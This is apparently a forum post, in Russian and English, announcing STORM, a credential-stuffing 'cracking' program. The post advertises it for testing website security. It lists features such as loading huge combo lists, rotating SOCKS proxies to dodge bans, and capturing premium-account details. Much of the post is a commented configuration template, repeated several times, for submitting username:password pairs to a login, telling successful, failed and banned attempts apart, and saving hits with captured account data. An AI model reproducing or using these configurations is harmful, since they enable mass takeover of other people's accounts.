-
Автор темы
- #1
STORM - это программа взлома, предназначенная для тестирования веб-сайта.
Информация о STORM:
STORM - это программа взлома, предназначенная для тестирования веб-сайта.
Проект начался в январе 2018 года MR.ViPeR.
Требования:
Microsoft .NET Framework 4.6.X
Windows 7 или более поздняя версия
Особенности:
Поддержка трещин FTP!
Возможность использования протоколов FTP и HTTP в одной конфигурации
Поддерживаются неограниченные этапы
Отладка формы для анализа и проверки настроек, отправки и получения данных
Загрузите до 20 миллионов списков комбо!
Поддержка HTTP / S
Поддерживает носки 4/5
Поддерживает автоматическое обновление прокси, когда вы загружаете новые прокси-программы.
Особенности расширенной конфигурации всех этапов двигателя с использованием специальных переменных: таким образом пользователь может правильно настроить двигатель для очень специализированных случаев.
Поддерживает полностью настраиваемые ключевые слова Capture (полезно для получения информации о премиум-аккаунте)
Поддерживает полностью настраиваемый переадресацию JavaScript JavaScript (полезно, чтобы получить страницу, на которой показана подробная информация о счете)
Поддержка нескольких дополнительных переадресаций формы
Поддержка специальных специальных функций соответствия ключевых слов
Поддерживает методы кодирования:
URLEncode / URLDecode - Описание: кодирование / декодирование строки
Base64 Encode / Decode - Описание: Base64 Кодирование / декодирование строки
Поддерживает связанные с строкой функции:
Верхний регистр / Нижний регистр - Описание: Верхний / нижний каждый символ строки / текста / источника
Length - Описание: Получает количество символов в предоставленной строке / тексте / источнике
Trim / TrimStart / TrimEnd - Описание: Trim And Replace Spaces в начале / конце или в обеих частях строки / текста / источника
Replace - Описание: Замените строку / текст / слово на строку / текст / слово
Подстрока - Описание: Извлечь строку / текст, указав начальный индекс и, возможно, длину, которую нужно извлечь до.
CombineText - Описание: Объединить / Слить несколько строк / текстов, порядок слияния будет порядком предоставленных аргументов
IndexOf - Описание: индекс возврата строки / текста в базе String / Text / Source
Добавить - Описание: Добавить строку / текст влево, если есть аргументы (аргументы)
FindTagVal - Описание: Получить / Извлечь текст между двумя строками / словом / текстом
RegexMatch - Описание: Получить / Извлечь текст, соответствующий заданному шаблону Regex на основе .NET.
RegexMatches - Описание: Получить / Извлечь все тексты, соответствующие шаблону Regex на основе .NET.
Поддерживает методы криптографической строки:
MD5 - Описание: Шифрование строки / текста в MD5
SHA - Описание: Шифрование строки для SHA-1 / SHA-256 / SHA-384 / SHA-512
HMAC - Описание: Шифрование строки для HMAC с несколькими типами хэшей ("MD5" / "RIPEMD160" / "SHA1" / "SHA256" / "SHA384" / "SHA512")
PBKDF2-HMAC-SHA256 - Описание: Шифрование строки для PBKDF2-HMAC-SHA256
PBKDF2-PKCS5 - Описание: Шифрование строки для PBKDF2-PKCS5
Поддерживает другие функции (будет скоро):
UnixTime - Описание: Return Current Timestamp (например: 1517516792.63398)
UnixTimeToDate - Описание: конвертирует временную метку Unix на сегодняшний день, например: 28.02.2012
If - Описание: Возвращает одно из двух значений в зависимости от значения булевского выражения
И многое другое функций и функций.
[General]
UseProxy = *
//This command for allow or not using proxy
// In this * you can put (True/False)
// Example: UseProxy = True
UseGlobalKeywords = True
DefaultTimeout = 10
// UnbanAllProxiesWhenAllBannedAfter = 0.1
HitsFolderName = *
//This command for saving hits in your folder which you can name by your target.
// In this * you can put (target API)
// Example: Hits1
// AutoUpdateProxies = SOCKS5|HTTP
[Stage-1]
Condition = Any
Variable-* = $* = "*"
//Link of your target
// In this first * you can put (1) its your variables, every variables must be different, second * ($Link), third * (
// Example: Variable-1 = $Link1 = "
Link = $*#
//Command for complete your link, you can make many variables with your link.
// In this * you can put (Link) from your first variable
// Example: Link = $Link1#
isFTP = False
HTTPVersion = *
//HTTP version of your connection.
// In this * you can put (1.0 or 1.1 or other)
// Example: HTTPVersion = 1.0
FollowRedirect = False
HTTPRequestMethod = *
//Method of your request link
// In this * you can put (GET/POST/OPTION/others)
// Example: HTTPRequestMethod = GET
Timeout = 10
Variable-* = $* = "*"
//Header of your link
// In this first example: * you can put (2) its your variables, every variables must be different, second example: * ($Head), third * example: (User-Agent: okhttp/3.9.0\nAccept: application/json\nContent-Type: application/json; charset=utf-8)
//Example: Variable-2 = $Head1 = "Connection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SM-N9008 Build/LRX21V)"
Headers = $*#
// In this * you can put (Head)
//Example Headers = $Head1#
Variable-* = $banKey = "*"
//ban key value, banKey you can name how you want (every banKey must be different if you adding new keys).
//Example: Variable-3 = $banKey1 = "You are banned!"
Variable-* = $FailedKey* = "*"
//Failed key value, Failed Key you can name how you want (every Failed Key must be different if you adding new keys).\
//Example: Variable-4 = $FailedKey1 = "401 Unauthorized"
Variable-* = $IndexOfbanKey = indexof($stage*responsesource#, $banKey#)
//ban key index for tool stats, but it's useless for the program with out Ban-Condition (every Variable,$IndexOfbanKey,$banKey# must be different)
//Example: Variable-5 = $IndexOfbanKey1 = indexof($stage1responsesource#, $banKey1#)
Variable-* = $IndexOfFailedKey = indexof($stage*responseheader#, $FailedKey#)
//bad key index for tool stats, but it's useless for the program with out Failure-Condition (every Variable,$IndexOfFailedKey,$FailedKey# must be different)
//Variable-6 = $IndexOfFailedKey1 = indexof($stage1responseheader#, $FailedKey1#)
Ban-Condition = $IndexOfbanKey1# >= 0
//This command for tool which use ban key for tool, not for stats! (its different!) if you want another ban key use this command ||, it will be looks like this (Ban-Condition = $IndexOfbanKey# >= 0 || $IndexOfbanKey2# >= 0)
Variable-* = $regexIndexOfStatus = indexof(regexmatch($stage*responsesource#, "*"), "*")
//this command will help you make key with jolly char, you can use it when you need make only premium hits
Example:
Variable-7 = $regexIndexOfStatus = indexof(regexmatch($stage2responsesource#, "datetocapture.*datetocapture"), "premium")
datetocapturepremiumdatetocapture -> only premium
datetocapturefreedatetocapture -> no premium here as we ask premium only
".*" <-- this is jolly char between datetocapture for check if inside premium or other key.
Note that wild cards/jolly chars are ONLY supported in regex functions as they're Regex!
$stage*responsesource# this command for checking on wich stage we will response data
Failure-Condition = $IndexOfFailedKey1# >= 0 || $regexIndexOfStatus# < 0
//This command for tool which use bad key for tool, not for stats! (its different!) if you want another ban key use this command ||, it will be looks like this (Failure-Condition = $IndexOfFailedKey# >= 0 || $IndexOfFailedKey2# >= 0)
//$regexIndexOfStatus# < 0 This command for tool which use regex code, you can use it with pair success key to check premium or free, in this case if get free then it goes to bad.
Variable-* = $token = findtagval($stage1responsesource#,"","")
//This command for parse token
//Example: Variable-8 = $Capture1 = findtagval($stage1responsesource#,"datetocapture","datetocapture")
Variable-* = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, "\ncapture: ", $token#)
//This command for txt file of your hits. Will be looks like this:
//================
//username:password
//capture:tokencapture
//Example: Variable-9 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, "\ncapture: ", $Capture1#)
Success-Condition = indexof($stage*response*#, $IndexOfSuccessKey#) >= 0
//This command for tool which use good key for tool, not for stats! (its different!)
//chr(double quotes) is " (look this link for additional info
//Example if you will use simple key not regex: Success-Condition = indexof($stage1responsesource#, $IndexOfSuccessKey#) >= 0
//Example 2 for this config which used regex: Success-Condition = $regexIndexOfStatus# >= 0
//this command for good key of regex
UseProxy = *
//This command for allow or not using proxy
// In this * you can put (True/False)
// Example: UseProxy = True
UseGlobalKeywords = True
DefaultTimeout = 10
// UnbanAllProxiesWhenAllBannedAfter = 0.1
HitsFolderName = *
//This command for saving hits in your folder which you can name by your target.
// In this * you can put (target API)
// Example: Hits1
// AutoUpdateProxies = SOCKS5|HTTP
[Stage-1]
Condition = Any
Variable-* = $* = "*"
//Link of your target
// In this first * you can put (1) its your variables, every variables must be different, second * ($Link), third * (
Пожалуйста, авторизуйтесь для просмотра ссылки.
)// Example: Variable-1 = $Link1 = "
Пожалуйста, авторизуйтесь для просмотра ссылки.
"Link = $*#
//Command for complete your link, you can make many variables with your link.
// In this * you can put (Link) from your first variable
// Example: Link = $Link1#
isFTP = False
HTTPVersion = *
//HTTP version of your connection.
// In this * you can put (1.0 or 1.1 or other)
// Example: HTTPVersion = 1.0
FollowRedirect = False
HTTPRequestMethod = *
//Method of your request link
// In this * you can put (GET/POST/OPTION/others)
// Example: HTTPRequestMethod = GET
Timeout = 10
Variable-* = $* = "*"
//Header of your link
// In this first example: * you can put (2) its your variables, every variables must be different, second example: * ($Head), third * example: (User-Agent: okhttp/3.9.0\nAccept: application/json\nContent-Type: application/json; charset=utf-8)
//Example: Variable-2 = $Head1 = "Connection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SM-N9008 Build/LRX21V)"
Headers = $*#
// In this * you can put (Head)
//Example Headers = $Head1#
Variable-* = $banKey = "*"
//ban key value, banKey you can name how you want (every banKey must be different if you adding new keys).
//Example: Variable-3 = $banKey1 = "You are banned!"
Variable-* = $FailedKey* = "*"
//Failed key value, Failed Key you can name how you want (every Failed Key must be different if you adding new keys).\
//Example: Variable-4 = $FailedKey1 = "401 Unauthorized"
Variable-* = $IndexOfbanKey = indexof($stage*responsesource#, $banKey#)
//ban key index for tool stats, but it's useless for the program with out Ban-Condition (every Variable,$IndexOfbanKey,$banKey# must be different)
//Example: Variable-5 = $IndexOfbanKey1 = indexof($stage1responsesource#, $banKey1#)
Variable-* = $IndexOfFailedKey = indexof($stage*responseheader#, $FailedKey#)
//bad key index for tool stats, but it's useless for the program with out Failure-Condition (every Variable,$IndexOfFailedKey,$FailedKey# must be different)
//Variable-6 = $IndexOfFailedKey1 = indexof($stage1responseheader#, $FailedKey1#)
Ban-Condition = $IndexOfbanKey1# >= 0
//This command for tool which use ban key for tool, not for stats! (its different!) if you want another ban key use this command ||, it will be looks like this (Ban-Condition = $IndexOfbanKey# >= 0 || $IndexOfbanKey2# >= 0)
Variable-* = $regexIndexOfStatus = indexof(regexmatch($stage*responsesource#, "*"), "*")
//this command will help you make key with jolly char, you can use it when you need make only premium hits
Example:
Variable-7 = $regexIndexOfStatus = indexof(regexmatch($stage2responsesource#, "datetocapture.*datetocapture"), "premium")
datetocapturepremiumdatetocapture -> only premium
datetocapturefreedatetocapture -> no premium here as we ask premium only
".*" <-- this is jolly char between datetocapture for check if inside premium or other key.
Note that wild cards/jolly chars are ONLY supported in regex functions as they're Regex!
$stage*responsesource# this command for checking on wich stage we will response data
Failure-Condition = $IndexOfFailedKey1# >= 0 || $regexIndexOfStatus# < 0
//This command for tool which use bad key for tool, not for stats! (its different!) if you want another ban key use this command ||, it will be looks like this (Failure-Condition = $IndexOfFailedKey# >= 0 || $IndexOfFailedKey2# >= 0)
//$regexIndexOfStatus# < 0 This command for tool which use regex code, you can use it with pair success key to check premium or free, in this case if get free then it goes to bad.
Variable-* = $token = findtagval($stage1responsesource#,"","")
//This command for parse token
//Example: Variable-8 = $Capture1 = findtagval($stage1responsesource#,"datetocapture","datetocapture")
Variable-* = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, "\ncapture: ", $token#)
//This command for txt file of your hits. Will be looks like this:
//================
//username:password
//capture:tokencapture
//Example: Variable-9 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, "\ncapture: ", $Capture1#)
Success-Condition = indexof($stage*response*#, $IndexOfSuccessKey#) >= 0
//This command for tool which use good key for tool, not for stats! (its different!)
//chr(double quotes) is " (look this link for additional info
Пожалуйста, авторизуйтесь для просмотра ссылки.
)//Example if you will use simple key not regex: Success-Condition = indexof($stage1responsesource#, $IndexOfSuccessKey#) >= 0
//Example 2 for this config which used regex: Success-Condition = $regexIndexOfStatus# >= 0
//this command for good key of regex
#####################################
################Good#################
#####################################
Example 1.
Variable-3 = $IndexOfSuccKey = indexof($stage1responsesource#, "Request was successful")
Variable-4 = $capture1 = findtagval($stage1responsesource#,"expire_date: (", ")")
Success-Condition = $IndexOfSuccKey# >= 0 && len($capture1#) > 0
Free-Condition = $IndexOfSuccKey# >= 0 && len($capture5#) < 1
Variable-6 = $IndexOfSuccKey = indexof($stage3responsesource#, "chr(double quotes)typechr(double quotes):chr(double quotes)successchr(double quotes)")
Variable-7 = $ExpireLength = len($Expire#)
Success-Condition = $IndexOfSuccKey# >= 0 && $ExpireLength# > 0
Example 2.
Variable-3 = $IndexOfSuccessKey1 = indexof($stage1responsesource#, "Welcome!")
Success-Condition = $IndexOfSuccessKey1# >= 0
#####################################
#################Bad#################
#####################################
Variable-3 = $FailedKey1 = "400 Bad Request"
Variable-4 = $FailedKey2 = "401 Bad Request"
Variable-5 = $FailedKey3 = "Wrong password !"
Variable-6 = $FailedKey4 = "User does not exist"
Variable-7 = $IndexOfFailedKey1 = indexof($stage1responseheader#, $FailedKey1#)
Variable-8 = $IndexOfFailedKey2 = indexof($stage1responseheader#, $FailedKey2#)
Variable-9 = $IndexOfFailedKey3 = indexof($stage1responsesource#, $FailedKey3#)
Variable-10 = $IndexOfFailedKey4 = indexof($stage1responsesource#, $FailedKey4#)
Failure-Condition = $IndexOfFailedKey1# >= 0 || $IndexOfFailedKey2# >= 0 || $IndexOfFailedKey3# >= 0 || $IndexOfFailedKey4# >= 0
#####################################
#################Ban#################
#####################################
Variable-3 = $banKey1 = "Login failed"
Variable-4 = $BanKey2 = "is suspended. Please contact support"
Variable-5 = $IndexOfbanKey1 = indexof($stage1responsesource#, $banKey#)
Variable-6 = $IndexOfBanKey2 = indexof($Stage1ResponseSource#, $BanKey2#)
Variable-7 = $IndexOfBanKey3 = indexof($Stage1ResponseHeader#, "Set-Cookie: locale=")
Ban-Condition = $IndexOfbanKey# >= 0 || $IndexOfBanKey2# >= 0 || $IndexOfBanKey3# < 0
#####################################
################Retry################
#####################################
Example 1.
Variable-3 = $RetryKey1 = "Set-Cookie: PHPSESSID="
Retry-Condition = indexof($stage1responseheader#, $RetryKey#) < 0
Example 2.
Variable-3 = $RetryKey1 = "Set-Cookie: PHPSESSID="
Variable-4 = $RetryKey2 = "missing_token"
Variable-5 = $RetryKey3 = "missing_token2"
Variable-5 = $IndexOfRetryKey1 = indexof($stage1responseheader#, $RetryKey1#)
Variable-5 = $IndexOfRetryKey2 = indexof($stage1responsesource#, $RetryKey2#)
Variable-5 = $IndexOfRetryKey3 = indexof($stage1responsesource#, $RetryKey3#)
Retry-Condition = $IndexOfRetryKey1# < 0 || $IndexOfRetryKey2# >= 0 || $IndexOfRetryKey3# >= 0
#####################################
##############Parsing################
#####################################
Example 1.
Variable-5 = $Expire = findtagval($stage3responsesource#,"chr(double quotes)expiryDatechr(double quotes):chr(double quotes)"," ")
Variable-6 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, "\nExpire: ", $Expire#)
Example 2.
Variable-3 = $Days = regexmatch($stage1responsesource#, "(?<=chr(double quotes)dayschr(double quotes): )(\d+)")
Variable-4 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, "\nDays: ", $Days#)
Example 3.
Variable-3 = $regexIndexOfStatus = indexof(regexmatch($stage1responsesource#, "statuschr(double quotes): chr(double quotes).*chr(double quotes)"), "Active")
Success-Condition = $regexIndexOfStatus# >= 0
#####################################
###############Forms#################
#####################################
Example 1.
[General]
UseProxy = True
UseGlobalKeywords = True
DefaultTimeout = 10
// UnbanAllProxiesWhenAllBannedAfter = 0.1
HitsFolderName = *
// AutoUpdateProxies = SOCKS5|HTTP
[Stage-1]
Condition = Any
Variable-1 = $Link = *
Link = $Link#
isFTP = False
HTTPVersion = 1.1
FollowRedirect = False
HTTPRequestMethod = POST
Timeout = 10
Variable-2 = $Heads = "*"
Headers = $Heads#
Variable-3 = $PostContent = combinetext(*)
PostContent = $PostContent#
Variable-4 = $* = "*"
Variable-5 = $* = "*"
Variable-6 = $* = "*"
Variable-7 = $IndexOf* = indexof($stage1responseheader#, $*#)
Variable-8 = $IndexOf* = indexof($stage1responsesource#, $*#)
Variable-9 = $IndexOf* = indexof($stage1responsesource#, $*#)
Variable-10 = $IndexOf* = indexof($stage1responsesource#, "*")
Failure-Condition = *
Variable-11 = $* = findtagval($stage1responsesource#,"*")
Variable-12 = $* = findtagval($stage1responsesource#,"*")
Variable-13 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, *)
Success-Condition = *
################Good#################
#####################################
Example 1.
Variable-3 = $IndexOfSuccKey = indexof($stage1responsesource#, "Request was successful")
Variable-4 = $capture1 = findtagval($stage1responsesource#,"expire_date: (", ")")
Success-Condition = $IndexOfSuccKey# >= 0 && len($capture1#) > 0
Free-Condition = $IndexOfSuccKey# >= 0 && len($capture5#) < 1
Variable-6 = $IndexOfSuccKey = indexof($stage3responsesource#, "chr(double quotes)typechr(double quotes):chr(double quotes)successchr(double quotes)")
Variable-7 = $ExpireLength = len($Expire#)
Success-Condition = $IndexOfSuccKey# >= 0 && $ExpireLength# > 0
Example 2.
Variable-3 = $IndexOfSuccessKey1 = indexof($stage1responsesource#, "Welcome!")
Success-Condition = $IndexOfSuccessKey1# >= 0
#####################################
#################Bad#################
#####################################
Variable-3 = $FailedKey1 = "400 Bad Request"
Variable-4 = $FailedKey2 = "401 Bad Request"
Variable-5 = $FailedKey3 = "Wrong password !"
Variable-6 = $FailedKey4 = "User does not exist"
Variable-7 = $IndexOfFailedKey1 = indexof($stage1responseheader#, $FailedKey1#)
Variable-8 = $IndexOfFailedKey2 = indexof($stage1responseheader#, $FailedKey2#)
Variable-9 = $IndexOfFailedKey3 = indexof($stage1responsesource#, $FailedKey3#)
Variable-10 = $IndexOfFailedKey4 = indexof($stage1responsesource#, $FailedKey4#)
Failure-Condition = $IndexOfFailedKey1# >= 0 || $IndexOfFailedKey2# >= 0 || $IndexOfFailedKey3# >= 0 || $IndexOfFailedKey4# >= 0
#####################################
#################Ban#################
#####################################
Variable-3 = $banKey1 = "Login failed"
Variable-4 = $BanKey2 = "is suspended. Please contact support"
Variable-5 = $IndexOfbanKey1 = indexof($stage1responsesource#, $banKey#)
Variable-6 = $IndexOfBanKey2 = indexof($Stage1ResponseSource#, $BanKey2#)
Variable-7 = $IndexOfBanKey3 = indexof($Stage1ResponseHeader#, "Set-Cookie: locale=")
Ban-Condition = $IndexOfbanKey# >= 0 || $IndexOfBanKey2# >= 0 || $IndexOfBanKey3# < 0
#####################################
################Retry################
#####################################
Example 1.
Variable-3 = $RetryKey1 = "Set-Cookie: PHPSESSID="
Retry-Condition = indexof($stage1responseheader#, $RetryKey#) < 0
Example 2.
Variable-3 = $RetryKey1 = "Set-Cookie: PHPSESSID="
Variable-4 = $RetryKey2 = "missing_token"
Variable-5 = $RetryKey3 = "missing_token2"
Variable-5 = $IndexOfRetryKey1 = indexof($stage1responseheader#, $RetryKey1#)
Variable-5 = $IndexOfRetryKey2 = indexof($stage1responsesource#, $RetryKey2#)
Variable-5 = $IndexOfRetryKey3 = indexof($stage1responsesource#, $RetryKey3#)
Retry-Condition = $IndexOfRetryKey1# < 0 || $IndexOfRetryKey2# >= 0 || $IndexOfRetryKey3# >= 0
#####################################
##############Parsing################
#####################################
Example 1.
Variable-5 = $Expire = findtagval($stage3responsesource#,"chr(double quotes)expiryDatechr(double quotes):chr(double quotes)"," ")
Variable-6 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, "\nExpire: ", $Expire#)
Example 2.
Variable-3 = $Days = regexmatch($stage1responsesource#, "(?<=chr(double quotes)dayschr(double quotes): )(\d+)")
Variable-4 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, "\nDays: ", $Days#)
Example 3.
Variable-3 = $regexIndexOfStatus = indexof(regexmatch($stage1responsesource#, "statuschr(double quotes): chr(double quotes).*chr(double quotes)"), "Active")
Success-Condition = $regexIndexOfStatus# >= 0
#####################################
###############Forms#################
#####################################
Example 1.
[General]
UseProxy = True
UseGlobalKeywords = True
DefaultTimeout = 10
// UnbanAllProxiesWhenAllBannedAfter = 0.1
HitsFolderName = *
// AutoUpdateProxies = SOCKS5|HTTP
[Stage-1]
Condition = Any
Variable-1 = $Link = *
Link = $Link#
isFTP = False
HTTPVersion = 1.1
FollowRedirect = False
HTTPRequestMethod = POST
Timeout = 10
Variable-2 = $Heads = "*"
Headers = $Heads#
Variable-3 = $PostContent = combinetext(*)
PostContent = $PostContent#
Variable-4 = $* = "*"
Variable-5 = $* = "*"
Variable-6 = $* = "*"
Variable-7 = $IndexOf* = indexof($stage1responseheader#, $*#)
Variable-8 = $IndexOf* = indexof($stage1responsesource#, $*#)
Variable-9 = $IndexOf* = indexof($stage1responsesource#, $*#)
Variable-10 = $IndexOf* = indexof($stage1responsesource#, "*")
Failure-Condition = *
Variable-11 = $* = findtagval($stage1responsesource#,"*")
Variable-12 = $* = findtagval($stage1responsesource#,"*")
Variable-13 = $SaveFormat = combinetext($ComboUsername#, ":", $ComboPassword#, *)
Success-Condition = *
Most flexible and first C# user-configurable cracking program
STORM is a cracking program designed to perform website security testing.
We're happy to release the first version of Storm, please find below all features, tutorials will be added later in separate thread.
Please let us know what you want to see in the next version(s), any suggestions would be greatly appreciated!
STORM is a cracking program designed to perform website security testing.
We're happy to release the first version of Storm, please find below all features, tutorials will be added later in separate thread.
Please let us know what you want to see in the next version(s), any suggestions would be greatly appreciated!
About STORM:
STORM is a cracking program designed to perform website security testing.
The project started on January 2018 by MR.ViPeR.
Requirements:
Microsoft .NET Framework 4.6.X
Windows 7 or Later
Features:
- Supports FTP cracking!
- Possible to use both FTP and HTTP stages in one config
- Unlimited stages are are supported
- Debug form for analyze and check settings, send and receive data
- Load up to 20million combo lists!
- Supports HTTP/S
- Supports Socks 4/5
- Supports auto update proxies, when you load fresh proxies program auto update exist proxies
- Features an advanced configuration of all the engine stages by using special variables: in this way user is able to configure correctly the engine for very specialized cases.
- Supports fully configurable Keywords Capture (useful in order to get premium account details)
- Supports fully configurable Form JavaScript Redirect (useful to get the page where a premium account detail is shown)
- Supports multiple additional form redirects
- Supports advanced special Keywords Matching Functions
- Supports encoding methods:
* URLEncode / URLDecode - Description: Encode/Decode an String
* Base64 Encode/Decode - Description: Base64 Encode/Decode an String
- Supports string-related functions:
* Uppercase / Lowercase - Description: Upper/Lower each char of String/Text/Source
* Length - Description: Gets the number of characters in the provided String/Text/Source
* Trim / TrimStart / TrimEnd - Description: Trim And Replace Spaces at Start/End or Both part of an String/Text/Source
* Replace - Description: Replace an string/text/word with an string/text/word
* Substring - Description: Extract an string/text by providing start index and optionally length to be extracted till.
* CombineText - Description: Combine/Merge several strings/texts, merge order will be the order of provided arguements
* IndexOf - Description: Return index of an string/text in in base String/Text/Source
* Add - Description: Add an String/Text to the left provided arguement(s)
* FindTagVal - Description: Get/Extract text between two strings/word/texts
* RegexMatch - Description: Get/Extract Text matched by the provided Regex Pattern Based on .NET
* RegexMatches - Description: Get/Extract All Texts matched by the provided Regex Pattern Based on .NET
-Supports crypto string methods:
* MD5 - Description: Encrypt an String/Text to MD5
* SHA - Description: Encrypt an String To SHA-1/SHA-256/SHA-384/SHA-512
* HMAC - Description: Encrypt an String to HMAC with several hash types ("MD5" / "RIPEMD160" / "SHA1" / "SHA256" / "SHA384" / "SHA512")
* PBKDF2-HMAC-SHA256 - Description: Encrypt an String to PBKDF2-HMAC-SHA256
* PBKDF2-PKCS5 - Description: Encrypt an String to PBKDF2-PKCS5
-Supports other functions (will be more soon):
* UnixTime - Description: Return Current Timestamp (like: 1517516792.63398)
* UnixTimeToDate - Description: Converts Unix Timestamp to date, like: 2/28/2018
* If - Description: Returns one of two values depending on the value of the Boolean expression
And much more functions and features.
Changelog is available in the archive.